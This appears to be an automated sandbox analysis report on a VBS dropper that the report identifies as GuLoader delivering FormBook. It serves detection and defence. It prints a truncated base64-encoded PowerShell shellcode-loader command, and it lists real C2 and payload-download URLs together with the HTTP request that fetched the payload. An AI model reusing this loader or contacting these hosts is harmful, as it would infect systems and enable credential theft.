      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgALQAxACwAWwByAGUAZgBdA
      Sigma detected: Non Interactive PowerShellShow sources
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgALQAxACwAWwByAGUAZgBdA
      Sigma detected: T1086 PowerShell ExecutionShow sources
      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132865880383508564.6420.DefaultAppDomain.powershell

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.jewelrystore1.com/wk3t/"], "decoy": ["cherrykidzclub.com", "n104w16417dongesbayrd.info", "pronetheus.com", "tukarbelanjadapatemas.com", "commlike.info", "securityhackersteam.com", "rainbowhitch.com", "nursesgrowhealth.com", "discontinuanceanywhere.com", "comprehensivetitle.site", "astrostorytell.store", "bighorncountymtjail.com", "tetoda.xyz", "derivedflame.online", "staging-api-projectstanley.com", "mcxca.com", "thebluefellowsnft.com", "arizonakissesco.com", "prototypephase.com", "aprillemack.com", "mrrviaa0.com", "reloindiana.com", "osscurrency.com", "orderlaespigabakery.com", "leohillmodeling.com", "ybferro.com", "laorganicwarehouse.com", "coastalrey.com", "gavno.online", "ienqqv.xyz", "ttautoglass.com", "jeffreywlewiscarpentry.com", "aromav60.online", "d4vlkjrx.xyz", "agooddomain.com", "pse516.info", "trustexpressfreight.com", "tropiksuncc.com", "greenrailfinancialgroup.com", "caoyuzhou.tech", "calibergaragedoorrepairsinc.com", "medxcuz.online", "vqjktrqkgikswr.top", "danaesoftware.com", "onlinemagazineshop.online", "exxxclusivenft.com", "whatweather.today", "smbyee.com", "bjitwb.com", "mellowsgummies.com", "romeovillepowerwashing.com", "cheapest-swimmingpool.com", "bagspabandung.com", "conservational.one", "watertalk-kickstarter.com", "japanesefood-osaka.com", "aml-corp.com", "insurancemetafi.com", "bjxsjkj.com", "teerspmr.com", "fmkj888.group", "lawoe.net", "promotourpackages.com", "danielsden.store"]}
      Source: 00000012.00000000.495265082.0000000002D00000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://www.wizumiya.co.jp/html/user_da"}
      Multi AV Scanner detection for submitted fileShow sources
      Source: MTIR22024323_0553381487_20220112120005.vbsReversingLabs: Detection: 12%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY
      Source: unknownHTTPS traffic detected: 52.68.15.223:443 -> 192.168.2.6:49775 version: TLS 1.2
      Source: Binary string: cmstp.pdbGCTL source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp
      Source: Binary string: ieinstal.pdbGCTL source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
      Source: Binary string: ieinstal.pdb source: cmstp.exe, 0000001B.00000002.891641953.0000000004CDF000.00000004.00020000.sdmp, explorer.exe, 00000022.00000000.720341637.0000000006F9F000.00000004.00020000.sdmp
      Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: ieinstal.exe, ieinstal.exe, 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp, ieinstal.exe, 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, cmstp.exe, cmstp.exe, 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, cmstp.exe, 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp
      Source: Binary string: cmstp.pdb source: ieinstal.exe, 00000012.00000002.602875581.00000000030F0000.00000040.00020000.sdmp

      Networking:

      barindex
      Potential malicious VBS script found (has network functionality)Show sources
      Source: Initial file: BinaryStream.SaveToFile Landsk, adSaveCreateOverWrite
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: www.jewelrystore1.com/wk3t/
      Source: Malware configuration extractorURLs: https://www.wizumiya.co.jp/html/user_da
      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /html/user_data/original/images/bin_WUOAiR166.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.wizumiya.co.jpCache-Control: no-cache
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: explorer.exe, 00000022.00000000.712071572.00000000049DC000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.719054481.00000000049DC000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: powershell.exe, 00000004.00000002.562105114.00000000074DC000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft
      Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmpString found in binary or memory: http://fahrschule-heli.at/bin_WUOAiR166.bin
      Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: explorer.exe, 00000022.00000003.708741474.0000000004BF0000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.711582257.0000000004BF0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microsoft.
      Source: powershell.exe, 00000004.00000002.553266966.0000000004631000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: explorer.exe, 00000016.00000000.550056536.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.525388426.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.574580825.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: cmstp.exe, 0000001B.00000002.879127665.00000000003F8000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
      Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000004.00000002.554251303.0000000004776000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000004.00000002.559061060.0000000005694000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmpString found in binary or memory: https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.bin
      Source: ieinstal.exe, 00000012.00000002.602935593.00000000031F0000.00000004.00000001.sdmpString found in binary or memory: https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.binhttp://fahrschule-heli.at
      Source: unknownDNS traffic detected: queries for: www.wizumiya.co.jp
      Source: global trafficHTTP traffic detected: GET /html/user_data/original/images/bin_WUOAiR166.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.wizumiya.co.jpCache-Control: no-cache
      Source: unknownHTTPS traffic detected: 52.68.15.223:443 -> 192.168.2.6:49775 version: TLS 1.2

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY

      System Summary:

      barindex
      Detected FormBook malwareShow sources
      Source: C:\Windows\SysWOW64\cmstp.exeDropped file: C:\Users\user\AppData\Roaming\O118090C\O11logri.iniJump to dropped file
      Source: C:\Windows\SysWOW64\cmstp.exeDropped file: C:\Users\user\AppData\Roaming\O118090C\O11logrv.iniJump to dropped file
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Wscript starts Powershell (via cmd or directly)Show sources
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAY
